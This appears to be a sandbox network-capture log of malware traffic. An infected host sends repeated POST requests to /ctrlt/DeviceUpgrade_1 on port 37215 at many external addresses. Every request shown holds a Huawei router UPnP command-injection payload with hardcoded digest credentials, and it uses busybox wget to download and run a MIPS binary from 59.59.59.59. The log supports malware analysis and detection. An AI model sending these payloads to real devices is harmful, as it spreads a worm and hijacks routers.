20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2238192.168.2.155651041.67.238.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.308865070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2239192.168.2.1539486197.234.191.4337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.314421892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2240192.168.2.154736441.230.209.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.138246059 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2241192.168.2.1556968183.173.195.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.138272047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2242192.168.2.1557716157.115.89.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.138307095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2243192.168.2.154408641.22.115.6137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.143399954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2244192.168.2.1534956197.117.214.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.169893026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2245192.168.2.1537030197.65.59.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.169939995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2246192.168.2.153483241.3.70.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.170022964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2247192.168.2.1542996197.190.93.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.170103073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2248192.168.2.1556962161.110.138.4337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.170140028 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
